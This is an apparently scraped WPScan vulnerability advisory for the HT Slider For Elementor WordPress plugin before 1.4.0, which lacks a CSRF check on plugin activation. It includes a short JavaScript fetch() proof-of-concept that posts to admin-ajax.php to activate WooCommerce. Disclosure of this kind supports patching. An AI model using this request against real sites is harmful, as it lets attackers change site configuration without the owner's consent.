Lucene search

K
wpvulndbLana CodesWPVDB-ID:2E3AF480-B1A4-404C-B0FC-2B7B6A6B9C27
HistoryFeb 28, 2023 - 12:00 a.m.

HT Slider For Elementor < 1.4.0 - Arbitrary Plugin Activation via CSRF

2023-02-2800:00:00
Lana Codes
wpscan.com
10
csrf
plugin activation
arbitrary
attackers
admins

EPSS

0.001

Percentile

32.8%

The plugin does not have CSRF check when activating plugins, which could allow attackers to make logged in admins activate arbitrary plugins present on the blog via a CSRF attack

PoC

activate woocommerce plugin exploit: fetch(‘http://localhost/wp-admin/admin-ajax.php’, { method: ‘POST’, headers: new Headers({ ‘Content-Type’: ‘application/x-www-form-urlencoded’, }), body: ‘action=ht-slider_ajax_plugin_activation&location;=woocommerce/woocommerce.php’, redirect: ‘follow’ }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log(‘error’, error));

EPSS

0.001

Percentile

32.8%

Related for WPVDB-ID:2E3AF480-B1A4-404C-B0FC-2B7B6A6B9C27